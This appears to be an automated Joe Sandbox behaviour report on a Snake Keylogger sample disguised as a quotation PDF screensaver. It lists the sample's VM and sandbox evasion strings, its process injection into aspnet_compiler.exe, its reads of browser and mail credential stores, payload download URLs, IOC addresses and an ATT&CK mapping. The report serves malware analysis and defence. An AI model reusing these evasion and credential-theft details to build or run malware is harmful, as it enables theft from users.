Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595077	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: aspnet_compiler.exe, 00000004.00000002.2949573602.000002C6190BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 1:en-CH:Microsoft\|VMWare\|Virtual
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 0VMware\|VIRTUH
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2334844929.000002C7BFE80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: QEMUOfD1iR
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A779B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: explorerJSbieDll.dllKcuckoomon.dllLwin32_process.handle='{0}'MParentProcessIdNcmdOselect * from Win32_BIOS8Unexpected WMI query failurePversionQSerialNumberSVMware\|VIRTUAL\|A M I\|XenTselect * from Win32_ComputerSystemUmanufacturerVmodelWMicrosoft\|VMWare\|VirtualXjohnYannaZxxxxxxxx
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2315387929.000002C7A5AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Code function: 0_2_00007FFD9BA166AF rdtsc

0_2_00007FFD9BA166AF

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 19020000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 2C619020000

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2950884480.000002C61AF69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2950884480.000002C61AD21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6012, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c61ab20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c61ab20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.2c62ad300e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2950884480.000002C61AF69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2950884480.000002C61AD21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6012, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Scheduled Task/Job	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	18%	ReversingLabs	Win64.Trojan.Generic
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
filetransfer.io	188.114.96.3	true	false	unknown
reallyfreegeoip.org	188.114.96.3	true	true	unknown
s23.filetransfer.io	188.114.96.3	true	false	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://s23.filetransfer.io/storage/download/gxyOEP84bSEs	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://filetransfer.io/data-package/jI82Ms6K/download	false		unknown
http://filetransfer.io/data-package/jI82Ms6K/download	false		unknown
https://reallyfreegeoip.org/xml/155.94.241.188	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/155.94.241.188p	aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-neti	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/14436606/23354	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A779B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/11564914/23354;	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	aspnet_compiler.exe, 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://filetransfer.io/data-package/jI82Ms6K/download?exceptionsAllowedBeforeBreakingAValue	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	false		unknown
http://reallyfreegeoip.org	aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AEE7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF43000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF55000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE4F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://filetransfer.io	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7702000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-net	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2335828598.000002C7C0080000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7BE9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2328766008.000002C7B7DCB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AEE7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF43000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE7D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF55000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AEE7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF43000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF0E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AF55000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AED4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://filetransfer.io	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A76C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://s23.filetransfer.io	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7734000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A76C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AD21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	aspnet_compiler.exe, 00000004.00000002.2950604363.000002C61AB20000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2953399954.000002C62AD29000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2950884480.000002C61AE2F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	filetransfer.io	European Union		13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543806
Start date and time:	2024-10-28 13:46:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe renamed because original name is a hash value
Original Sample Name:	QUOTATION_OCTQTRA071244PDF.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@4/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 70% Number of executed functions: 214 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, PID 3244 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
08:46:59	API Interceptor	35092x Sleep call for process: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe modified
08:48:03	API Interceptor	37542x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	9D7RwuJrth.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
	DBUfLVzZhf.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	R5AREmpD4S.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	7950COPY.exe	Get hash	malicious	FormBook	Browse	www.globaltrend.xyz/b2h2/
	transferencia interbancaria_667553466579.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/Gitmx
	19387759999PO-RFQ-INVOICE-doc.exe	Get hash	malicious	FormBook	Browse	www.zonguldakescortg.xyz/483l/
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/876i/
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.fnsds.org/
	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	dddotx.shop/Mine/PWS/fre.php
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/nwtkd
158.101.44.242	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	checkip.dyndns.org/
	g1TLK7mbZD.img	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Renommxterne.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	na.doc	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
